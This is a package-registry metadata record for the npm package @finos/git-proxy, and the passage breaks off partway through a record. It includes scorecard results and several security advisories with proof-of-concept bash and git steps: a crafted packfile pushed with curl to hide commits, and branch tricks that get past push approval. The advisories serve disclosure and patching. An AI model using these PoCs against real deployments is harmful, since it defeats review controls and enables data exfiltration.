{"id":7862456,"name":"@finos/git-proxy","ecosystem":"npm","description":"Deploy custom push protections and policies on top of Git.","homepage":"https://github.com/finos/git-proxy#readme","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/finos/git-proxy","keywords_array":[],"namespace":"finos","versions_count":50,"first_release_published_at":"2023-06-27T21:45:22.278Z","latest_release_published_at":"2025-07-30T15:20:11.050Z","latest_release_number":"1.19.2","last_synced_at":"2026-04-18T02:11:43.184Z","created_at":"2023-06-28T04:40:09.604Z","updated_at":"2026-04-18T05:12:18.072Z","registry_url":"https://www.npmjs.com/package/@finos/git-proxy","install_command":"npm install @finos/git-proxy","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.19.2","rc":"2.0.0-rc.6"}},"repo_metadata":{"id":38990448,"uuid":"256513079","full_name":"finos/git-proxy","owner":"finos","description":"Deploy custom push protections and policies on top of Git","archived":false,"fork":false,"pushed_at":"2026-03-13T10:48:34.000Z","size":20012,"stargazers_count":197,"open_issues_count":104,"forks_count":154,"subscribers_count":10,"default_branch":"main","last_synced_at":"2026-03-13T15:08:24.535Z","etag":null,"topics":["gitops","scans","security"],"latest_commit_sha":null,"homepage":"https://git-proxy.finos.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/finos.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":"NOTICE","maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2020-04-17T13:38:25.000Z","updated_at":"2026-03-12T16:33:05.000Z","dependencies_parsed_at":"2026-02-26T06:03:37.600Z","dependency_job_id":null,"html_url":"https://github.com/finos/git-proxy","commit_stats":null,"previous_names":[],"tags_count":56,"template":false,"template_full_name":null,"purl":"pkg:github/finos/git-proxy","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos","download_url":"https://codeload.github.com/finos/git-proxy/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/sbom","scorecard":{"id":708597,"data":{"date":"2025-08-22T07:26:23Z","repo":{"name":"github.com/finos/git-proxy","commit":"94d807d077834539af09f0f450e7478c5eb3abcd"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.6,"checks":[{"name":"Code-Review","score":6,"reason":"Found 4/6 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 3 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:41","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/pr-lint.yml:20","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/experimental-inventory-cli-publish.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/experimental-inventory-publish.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/npm.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-lint.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/sample-publish.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/unused-dependencies.yml:5"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":8,"reason":"dependency not pinned by hash detected -- score normalized to 8","details":["Warn: npmCommand not pinned by hash: .github/workflows/ci.yml:47","Warn: npmCommand not pinned by hash: .github/workflows/lint.yml:33","Warn: npmCommand not pinned by hash: .github/workflows/sample-publish.yml:28","Info:  27 out of  27 GitHub-owned GitHubAction dependencies pinned","Info:  19 out of  19 third-party GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/experimental-inventory-cli-publish.yml:13"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: JavaScriptPropertyBasedTesting integration found: test/processors/blockForAuth.test.js:1","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkAuthorEmails.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkCommitMessages.test.js:5","Info: JavaScriptPropertyBasedTesting integration found: test/processors/checkUserPushPermission.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/processors/getDiff.test.js:4","Info: JavaScriptPropertyBasedTesting integration found: test/testCheckRepoInAuthList.test.js:6"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"CI-Tests","score":10,"reason":"6 out of 6 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 25 contributing companies or organizations","details":["Info: found contributions from: Fl4gSm4sher, InnerSourceCommons, MLH-Fellowship, NixOS, RBC, citi, composr, controlplaneio, director of ciam core platform engineering at barclays, finos, finos @sessiontechnologies, finos-fdx, freelancer, g-research open source software, g-research open-source software, get-kindr, gitlabhq, lugnitdgp, natwest group, openjs-foundation, probr, rbc, sessiontechnologies, sonatype, turntabl"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"26 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-75v8-2h7p-7m2m","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-f7f6-9jq7-3rqj","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-x7hr-w5r2-h6wg","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-4vvj-4cpr-p986","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-22T07:29:00.840Z","repository_id":38990448,"created_at":"2025-08-22T07:29:00.840Z","updated_at":"2025-08-22T07:29:00.840Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30601208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-16T23:44:20.790Z","status":"ssl_error","status_checked_at":"2026-03-16T23:44:16.532Z","response_time":96,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"finos","name":"The Fintech Open Source Foundation (www.finos.org)","uuid":"35377814","kind":"organization","description":"FINOS’ mission is to promote open innovation in financial services. See our full list of repos from our nearly 100 projects \u0026 11 programs at finos.github.io","email":"info@finos.org","website":"https://landscape.finos.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/35377814?v=4","repositories_count":149,"last_synced_at":"2024-04-12T02:16:37.856Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/finos","funding_links":[],"total_stars":12474,"followers":681,"following":0,"created_at":"2022-11-13T03:59:27.742Z","updated_at":"2024-04-12T02:17:10.136Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/finos/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-04-18T02:12:49.081Z","dependent_packages_count":0,"downloads":318,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":14.830938223453364,"dependent_repos_count":10.373648108865972,"dependent_packages_count":52.16365939791549,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":25.789415243411607},"purl":"pkg:npm/%40finos/git-proxy","advisories":[{"uuid":"GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","url":"https://github.com/advisories/GHSA-v98g-8rqx-g93g","title":"GitProxy Hidden Commits Injection","description":"### Summary\nAn attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality.\n\n### Details\n\nThe proxy currently trusts only the ref‑update line (`oldOid → newOid`) and doesn't inspect the packfile’s contents\n\nBecause the code only runs `git rev-list oldOid..newOid` to compute **introducedCommits** but **never** checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA. \n\u003cimg width=\"2556\" height=\"744\" alt=\"Screenshot 2025-07-16 at 12 29 19\" src=\"https://github.com/user-attachments/assets/abf459a9-310b-4819-a989-797c7e871790\" /\u003e\n\n### PoC\n\n#### Prerequisites\n\n-   A GitHub Personal Access Token stored in `~/.github-test-pat`.\n-   A test repository also registered in git-proxy, e.g. `your-org/test-repo.git`, to which you have push rights.\n\n#### 1. Prepare the “visible” and “hidden” commits\n\n```bash\n# Clone the test repository\ngit clone http://localhost:8000/your-org/test-repo.git\ncd test-repo\n\n# 1. Record the original HEAD\nORIG_COMMIT=$(git rev-parse HEAD)\n\n# 2. Create branch 'foo' and add a visible commit\ngit checkout -b foo\necho \"visible commit\" \u003e\u003e file.txt\ngit add file.txt\ngit commit -m \"Visible commit\"\nVISIBLE_COMMIT=$(git rev-parse HEAD)\n\n# 3. Go back to the original commit and create a hidden-branch\ngit checkout $ORIG_COMMIT\ngit checkout -b hidden-branch\necho \"hidden change\" \u003e hidden.txt\ngit add hidden.txt\ngit commit -m \"Hidden commit\"\nHIDDEN_COMMIT=$(git rev-parse HEAD)\n\n# Return to 'foo'\ngit checkout foo\n```\n\n#### 2. Push only the visible commit to branch `foo`\n\n```bash\ngit push --set-upstream origin foo\n# An authorized user approves this push via your normal review workflow\n```\n\n#### 3. Build and push a pack containing the hidden commit\n\nCreate a script named `upload-pack.sh` (replace the placeholder variables with the SHAs you recorded above):\n\n```bash\n#!/usr/bin/env bash\nREMOTE_URL=\"http://localhost:8000/your-org/test-repo.git\"\nREF_NAME=\"refs/heads/foo\"\nORIG_COMMIT=\"\u003c\u003cORIG_COMMIT\u003e\u003e\"\nNEW_COMMIT=\"\u003c\u003cVISIBLE_COMMIT\u003e\u003e\"\nOLD_COMMIT=\"0000000000000000000000000000000000000000\"\nHIDDEN_COMMIT=\"\u003c\u003cHIDDEN_COMMIT\u003e\u003e\"\n\n# 1. List all objects for the visible and hidden commits\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${NEW_COMMIT} \u003e objects.txt\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${HIDDEN_COMMIT} \u003e\u003e objects.txt\n\n# 2. Pack them into a single packfile\ncat objects.txt\ngit pack-objects --stdout \u003c objects.txt \u003e packfile\n\n# 3. Construct the Git smart‑protocol update header\nprintf \"${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5\" \u003e update_line\nUPDATE_LINE_LEN=\"$(wc -c \u003c update_line)\"\n\nprintf \"%04x\" $((UPDATE_LINE_LEN + 4)) \u003e output\ncat update_line \u003e\u003e output\n\n# Git smart protocol expects a flush packet\nPKT_FLUSH=\"0000\"\nprintf \"%s\" \"${PKT_FLUSH}\" \u003e\u003e output\n\n# Append the packfile\ncat packfile \u003e\u003e output\n\n# 4. Send the malicious push via curl\ncurl -u ${USER}:\"$(\u003c~/.github-test-pat)\" \\\n  -X POST \"${REMOTE_URL}/git-receive-pack\" \\\n  -H \"Content-Type: application/x-git-receive-pack-request\" \\\n  -H \"Accept: application/x-git-receive-pack-result\" \\\n  --user-agent \"git/2.42.0\" \\\n  --data-binary @output | cat -v\n```\n\nMake it executable:\n\n```bash\nchmod +x upload-pack.sh\n```\n\nRun it:\n\n```bash\n./upload-pack.sh\n```\n\n#### 4. Verify the hidden commit\n\nOpen in your browser (or via `curl`):\n\n```\nhttps://github.com/your-org/test-repo/commit/\u003c\u003cHIDDEN_COMMIT\u003e\u003e\n```\n\nYou will see the **“Hidden commit”**, even though it is not referenced by any branch.\n\n### Impact\n- **Data Exfiltration (Confidentiality breach):**  \n  Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy.\n\n- **Undetectable in UI:**  \n  Since the hidden commits never appear in branch graphs, standard code review will not surface them.\n\n- **Persistence Window:**  \n  GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g","https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54586","https://github.com/advisories/GHSA-v98g-8rqx-g93g"],"source_kind":"github","identifiers":["GHSA-v98g-8rqx-g93g","CVE-2025-54586"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:08:51.070Z","updated_at":"2026-04-18T05:02:22.181Z","epss_percentage":0.00066,"epss_percentile":0.20497,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OThnLThycXgtZzkzZ84ABKqQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","url":"https://github.com/advisories/GHSA-39p2-8hq9-fwj6","title":"GitProxy New Branch Approval Exploit","description":"### Summary\nAn attacker can exploit the way GitProxy handles new branch creation to bypass the approval of prior commits on the parent branch.\n\nBecause it can greatly affect system integrity, we classify this as a High impact vulnerability.\n\n### Details\nGitProxy checks for the `0000000000000000000000000000000000000000` hash to detect new branches. This is used to process the commit accordingly in both `getDiff.ts` and `parsePush.ts`. However, the logic can be exploited as follows:\n\n1. Make a commit in branch `a` (could be `main`)\n2. Make a new branch `b` from that commit\n3. Make a new commit in `b`, then approve it/get it approved\n4. Go back to `a`, and attempt to push this commit to the proxy\n\nThe unapproved commit from `a` will be pushed to the remote.\n\n### PoC\nTo reproduce this vulnerability:\n\n1. Clone the target repository and make an unapproved commit on a mainline branch (e.g. main):\n\n```bash\ngit checkout -b a origin/main\necho \"DEBUG=true\" \u003e config.env\ngit add config.env\ngit commit -m \"Sensitive debug config\"\ngit push proxy a\n```\n\n2. Without approving/getting the commit approved on branch `a`, create a new branch `b` based on it:\n\n```bash\ngit checkout -b b\necho \"feature x implemented\" \u003e feature.txt\ngit add feature.txt\ngit commit -m \"Feature implementation\"\ngit push proxy b\n```\n\n3. Approve/get approval for the push to branch `b`.\n\n4. Now attempt to push the original unapproved commit from branch `a`:\n\n```bash\ngit checkout a\ngit push proxy a\n```\n\nPrior to `1.19.2`, this results in unapproved commits from `a` getting pushed without any policy checks or explicit approval.\n\nFrom `1.19.2` onwards, this flow will allow pushing all commits to branch `b` (and explicit approval will be asked for the changes on `b` only). However, commits on branch `a` now require approval on push. If merging branch `b` into `a`, this also requires explicit approval of the (previously unapproved) commits originating from `a` to prevent loopholes.\n\n### Impact\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policy and prevent unapproved changes. It requires no elevated privileges beyond regular push access, and no extra user interaction. It does however, require a GitProxy administrator or designated user (`canUserApproveRejectPush`) to approve pushes to the child branch.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-39p2-8hq9-fwj6","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/commit/f99fe42082eab0970e4cd0acdc3421a527a7e531","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54585","https://github.com/advisories/GHSA-39p2-8hq9-fwj6"],"source_kind":"github","identifiers":["GHSA-39p2-8hq9-fwj6","CVE-2025-54585"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:09.422Z","updated_at":"2026-04-18T05:02:22.182Z","epss_percentage":0.00059,"epss_percentile":0.18555,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zOXAyLThocTktZndqNs4ABKqO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","url":"https://github.com/advisories/GHSA-xxmh-rf63-qwjv","title":"GitProxy Backfile Parsing Exploit","description":"### Summary\nAn attacker can craft a malicious Git packfile to exploit the PACK signature detection in the `parsePush.ts`. By embedding a misleading PACK signature within commit content and carefully constructing the packet structure, the attacker can trick the parser into treating invalid or unintended data as the packfile. Potentially, this would allow bypassing approval or hiding commits.\n\n### Details\nThe affected version of `parsePush.ts` attempts to locate the Git PACK file by looking for the last occurrence of the string \"PACK\" in the incoming push payload:\n\n```ts\nconst packStart = buffer.lastIndexOf('PACK');\n```\n\nThis assumes that any \"PACK\" string near the end of the push is the beginning of the actual binary Git packfile. However, Git objects (commits, blobs, etc.) can contain arbitrary content (including the word PACK) in binary or non-compressed blobs.\n\nAn attacker could abuse this by:\n1. Crafting a custom packfile using low-level Git tools or by manually forging one\n2. Placing the string \"PACK\" inside a commit body or a binary file blob that appears after the real PACK start in the stream.\n\nThe parser then ignores the actual push and treats the binary blob/commit body as the PACK file. The actual push contents may violate existing push policies.\n\n### PoC\n\n1. Make a commit on any branch (example: `test-branch`) containing the string \"PACK\"\n2. Manually generate a custom packfile with both branches using `git pack-objects` or a low-level library/custom script:\n  a) Add the string \"PACK\" after the real packfile's PACK header in the binary stream\n3. Push using a custom client/raw protocol injection\n\n### Impact\n\nAttackers with push access can hide commits from scanning/approval and make changes that bypass policies, potentially inserting unwanted/malicious code into a GitProxy protected repository.\n\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policies and prevent unapproved changes. It requires no elevated privileges beyond regular push access, and no extra user interaction, however, it does require a considerable amount of technical skill and intentional effort to accomplish.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:40:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.0,"cvss_vector":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-xxmh-rf63-qwjv","https://github.com/finos/git-proxy/commit/333c98a165a5a1ec88414db3d4a2c6f81e083e0f","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54584","https://github.com/advisories/GHSA-xxmh-rf63-qwjv"],"source_kind":"github","identifiers":["GHSA-xxmh-rf63-qwjv","CVE-2025-54584"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:06.202Z","updated_at":"2026-04-18T05:02:22.181Z","epss_percentage":0.00066,"epss_percentile":0.20494,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14eG1oLXJmNjMtcXdqds4ABKqP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","url":"https://github.com/advisories/GHSA-qr93-8wwf-22g4","title":"GitProxy Approval Bypass When Pushing Multiple Branches","description":"### Summary\nThis vulnerability allows a user to push to the remote repository while bypassing policies and explicit approval. Since checks and plugins are skipped, code containing secrets or unwanted changes could be pushed into a repository.\n\nBecause it can allow policy violations to go undetected, we classify this as a High impact vulnerability.\n\n### Details\nThe source of the vulnerability is the push parser action `parsePush.ts`. It reads the first branch and parses it, while ignoring subsequent branches (silently letting them go through).\n\nAlthough the fix involves multiple improvements to the commit and push parsing logic, the core solution is to prevent multiple branch pushes from going through in the first place:\n\n```ts\nif (refUpdates.length !== 1) {\n  step.log('Invalid number of branch updates.');\n  step.log(`Expected 1, but got ${refUpdates.length}`);\n  step.setError('Your push has been blocked. Please make sure you are pushing to a single branch.');\n  action.addStep(step);\n  return action;\n}\n```\n\n### PoC\n\n1. Make a commit on a branch:\n\n```bash\ngit checkout -b safe-branch\necho \"Approved code\" \u003e file.txt\ngit add .\ngit commit -m \"Approved code\"\ngit push proxy safe-branch\n```\n\n2. Wait for approval of `safe-branch`.\n\n3. Make a commit on a separate branch with a secret, for example:\n\n```bash\ngit checkout -b bad-branch\necho \"SECRET=abc123\" \u003e .env\ngit add .\ngit commit -m \"Bad code\"\n```\n\n4. Push both at the same time:\n\n`git push proxy safe-branch bad-branch`\n\n#### Expected Result\nIdeally, this would force checks to run for the second branch while sending it out for approval. Meanwhile, the first branch would be pushed to the remote. A simpler solution is to simply prevent multiple branch pushes.\n\n#### Actual Result\nBoth branches get pushed to the 